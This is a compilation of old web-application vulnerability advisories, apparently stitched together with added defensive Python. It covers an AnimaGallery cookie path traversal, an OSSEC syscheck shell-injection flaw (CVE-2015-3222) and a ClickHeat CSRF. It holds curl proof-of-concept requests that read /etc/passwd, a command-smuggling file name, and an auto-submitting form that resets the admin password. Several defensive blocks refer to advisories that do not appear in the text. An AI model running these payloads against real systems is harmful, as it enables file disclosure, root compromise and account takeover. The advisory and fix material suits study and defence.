  if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
    $LANG = $_COOKIE['lang'];    // <-- no taint checking

  return(array($THEME, $LANG));
}


* Proof of Concept

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
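As an added defensive example serving both the Bonita themeResource traversal (CVE-2015-3897) above and the AnimaGallery cookie includes here (not code from either project), the Python below shows the two checks that stop these inputs: an allow-list for a single name that is spliced into a fixed include path, and a resolve-then-compare check for a base directory plus user-controlled sub-path. Base directory and file names are assumptions; the payloads are the ones from the two advisories.

```python
import os
import re

# Only names of this shape may select a theme or language file: letters, digits,
# underscore and hyphen, so no "/", "." or NUL byte can reach include().
COMPONENT_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def is_safe_component(value):
    """Allow-list check for one path component taken from a cookie or parameter."""
    return bool(COMPONENT_RE.match(value))


def language_file(lang, languages_dir="languages"):
    """Safe counterpart of include('languages/'.$LANG.'.php'): allow-listed name plus
    a fixed suffix, so "../../../../../../../etc/passwd\\x00" is refused outright."""
    if not is_safe_component(lang):
        return None
    return os.path.join(languages_dir, lang + ".php")


def resolve_under(base_dir, *user_parts):
    """Join untrusted parts (e.g. theme and location) under base_dir and return the
    resolved path, or None if the result lies outside base_dir."""
    if any("\x00" in part for part in user_parts):
        return None                    # NUL truncates names in C/PHP; never pass it on
    base = os.path.realpath(base_dir)
    # os.path.join discards base if a part is absolute; realpath collapses "..";
    # the prefix test below catches both escapes.
    candidate = os.path.realpath(os.path.join(base, *user_parts))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def is_contained(base_dir, *user_parts):
    """Boolean form of resolve_under for callers that only need a yes/no answer."""
    return resolve_under(base_dir, *user_parts) is not None


if __name__ == "__main__":
    themes = "/srv/bonita/themes"                     # assumed base directory
    traversal = "portal/" + "../" * 16                # theme value from the advisory
    print(resolve_under(themes, "portal", "css/portal.css"))
    print(resolve_under(themes, traversal, "Windows/system.ini"))
    print(language_file("en"), language_file("../../../../../../../etc/passwd\x00"))
```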
            
Fix for CVE-2015-3222 which allows for root escalation via syscheck - https://github.com/ossec/ossec-hids/releases/tag/2.8.2

Affected versions: 2.7 - 2.8.1

Beginning in OSSEC 2.7 (d88cf1c9) a feature called "report_changes" was
added to syscheck, the daemon that monitors file changes on a system.
This feature is only available on *NIX systems. Its purpose is to help
determine what about a file has changed. The logic that accomplishes
this, found in src/syscheck/seechanges.c, is as follows:

252 /* Run diff */
253 date_of_change = File_DateofChange(old_location);
254 snprintf(diff_cmd, 2048, "diff \"%s\" \"%s\"> \"%s/local/%s/diff.%d\" "
255     "2>/dev/null",
256     tmp_location, old_location,
257     DIFF_DIR_PATH, filename + 1, (int)date_of_change);
258 if (system(diff_cmd) != 256) {
259     merror("%s: ERROR: Unable to run diff for %s",
260            ARGV0,  filename);
261     return (NULL);
262 }

Above, on line 258, the system() call is used to shell out to the
system's "diff" command. The raw filename is interpolated into the command
string, which presents an attacker with the possibility of running arbitrary
code. Since the syscheck daemon runs as the root user so that it can inspect
any file on the system for changes, any code run using this vulnerability
is also run as the root user.

An example attack might be creating a file called "foo-$(touch bar)"
which should create another file "bar".

Again, this vulnerability exists only on *NIX systems and is contingent
on the following criteria:

1. A vulnerable version is in use.
2. The OSSEC agent is configured to use syscheck to monitor the file
system for changes.
3. The list of directories monitored by syscheck includes those writable
by underprivileged users.
4. The "report_changes" option is enabled for any of those directories.

The fix for this is to create temporary trusted file names that symlink
back to the original files before calling system() and running the
system's "diff" command.                                          
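As an added example (not OSSEC's own patch), the Python below reproduces the command string seechanges.c builds, so the injection point is visible, and then runs the same diff without a shell: the two paths go to diff as argv entries and the output file is opened by the caller, so no character of the monitored file name is ever parsed by /bin/sh. This is an alternative to the trusted-symlink fix described above; demo() uses the advisory's "foo-$(touch bar)" name in a temporary directory and assumes diff is on PATH.

```python
import os
import shutil
import subprocess
import tempfile

DIFF_AVAILABLE = shutil.which("diff") is not None


def vulnerable_command_string(tmp_location, old_location, diff_dir, filename, date_of_change):
    """The string lines 254-257 hand to system(). Returned only to show what the shell
    would parse (filename + 1 skips the leading '/'); it is never executed here."""
    return 'diff "%s" "%s"> "%s/local/%s/diff.%d" 2>/dev/null' % (
        tmp_location, old_location, diff_dir, filename[1:], date_of_change)


def run_report_changes(tmp_location, old_location, diff_dir, filename, date_of_change, cwd=None):
    """Shell-free replacement for the system() call. Returns the diff file path when
    the files differ, None otherwise (the C code tests system() != 256, i.e. exit 1)."""
    out_dir = os.path.join(diff_dir, "local", filename.lstrip("/"))
    os.makedirs(out_dir, exist_ok=True)
    out_path = os.path.join(out_dir, "diff.%d" % date_of_change)
    with open(out_path, "wb") as out:
        # argv list, no shell: "--" also stops diff from reading a path as an option
        proc = subprocess.run(["diff", "--", tmp_location, old_location],
                              stdout=out, stderr=subprocess.DEVNULL, cwd=cwd)
    return out_path if proc.returncode == 1 else None


def demo():
    """Monitor a file named as in the advisory and show that the argv-based call
    neither runs the embedded command nor fails on the odd name."""
    result = {"diff_available": DIFF_AVAILABLE, "injected_file_created": None,
              "diff_output": None}
    with tempfile.TemporaryDirectory() as root:
        filename = "/foo-$(touch bar)"              # file name from the advisory
        old_copy = os.path.join(root, "old_copy")
        new_copy = os.path.join(root, "new_copy")
        with open(old_copy, "w") as f:
            f.write("alpha\n")
        with open(new_copy, "w") as f:
            f.write("alpha\nbeta\n")
        if DIFF_AVAILABLE:
            out = run_report_changes(new_copy, old_copy, os.path.join(root, "diff"),
                                     filename, 1433937600, cwd=root)
            if out is not None:
                with open(out) as f:
                    result["diff_output"] = f.read()
        # A shell would have executed `touch bar` in its working directory (root here).
        result["injected_file_created"] = os.path.exists(os.path.join(root, "bar"))
    return result


if __name__ == "__main__":
    print(vulnerable_command_string("/tmp/new", "/var/ossec/queue/diff/old",
                                    "/var/ossec/queue/diff", "/foo-$(touch bar)", 1))
    print(demo())
```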
            
# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
# Google Dork: allinurl:/clickheat/
# Date: 11-06-2015
# Exploit Author: David Shanahan (@CyberpunkSec)
# Contact: https://twitter.com/CyberpunkSec
# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
# Version: 1.14
# Tested on: Windows

---- Description ----

ClickHeat is vulnerable to a CSRF attack because it does not implement a
CSRF token when updating the config file.  If an authenticated admin is
tricked into opening this malicious URL, the form will be submitted which
changes the administrator password to the one the attacker has specified.

---- CSRF PoC ----

Set the value of "adminLogin" to the administrator's username, then set the
value of "adminPass" to an MD5 hash of the password you want (you may also
need to change "logPath" and "cachePath").

/* CODE */

<body onload="document.forms[0].submit()">

<form action="http://127.0.0.1/clickheat/index.php?action=config"
method="post" class="center">
<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"adminLogin";s:5:"admin";s:9:"adminPass";s:32:"5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}" />
<input type="hidden" name="save" value="true" /><input type="submit"
value="Save configuration" /></form>

/* CODE */

---- Solution ----

The ClickHeat project seems to be dead, as it has not been updated since
late 2011.  Due to this, I truly doubt a patch will be issued so I would
recommend removing this product from your website.
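The four CSRF cases on this page (ISPConfig users_edit.php, the OmniSwitch EmWeb forms, the Encrypted Contact Form plugin and ClickHeat's config save) share one missing check: nothing in the POST is unguessable by a foreign page. As an added example (not code from any of those products), the Python below implements that check as a session-bound HMAC token plus an Origin/Referer comparison, and exercises it with constructed requests modelled on the OmniSwitch case; the host, the session cookie value and the field names are taken from that advisory, everything else is assumed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Per-deployment secret; generated here for the example, persisted in a real service.
SECRET_KEY = secrets.token_bytes(32)
SAFE_METHODS = ("GET", "HEAD", "OPTIONS")


def issue_csrf_token(session_id):
    """Token bound to the login session and rendered into every state-changing form.
    A page on another origin can make the browser send the session cookie, but it
    cannot read this value, so it cannot build a request that carries it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_matches(headers, expected_host):
    """Independent second check: the Origin (or, failing that, Referer) of a
    state-changing request must name our own host."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc.lower() == expected_host.lower()


def is_request_allowed(method, headers, form, session_id, expected_host):
    """The decision the vulnerable endpoints skip: a POST is accepted only with a
    token valid for this session and a same-site Origin."""
    if method.upper() in SAFE_METHODS:
        return True                # read-only methods; state changes must not live on GET
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False
    return origin_matches(headers, expected_host)


# Constructed requests. The browser attaches the session cookie to both of them.
SESSION = "sess_15739"             # cookie value shown in the OmniSwitch advisory
HOST = "192.0.2.1"


def legitimate_request():
    form = {"EmWeb_ns:mip:2.T1:I1": "newuser", "csrf_token": issue_csrf_token(SESSION)}
    return "POST", {"Origin": "http://192.0.2.1", "Cookie": "session=" + SESSION}, form


def forged_request():
    # Auto-submitted hidden form on another site: every EmWeb field is predictable,
    # but the token is not, and the browser sets Origin to the other site.
    form = {"EmWeb_ns:mip:2.T1:I1": "newuser"}
    return "POST", {"Origin": "http://attacker.example", "Cookie": "session=" + SESSION}, form


if __name__ == "__main__":
    for name, (method, headers, form) in (("legitimate", legitimate_request()),
                                          ("forged", forged_request())):
        verdict = is_request_allowed(method, headers, form, SESSION, HOST)
        print(name, "allowed" if verdict else "rejected")
```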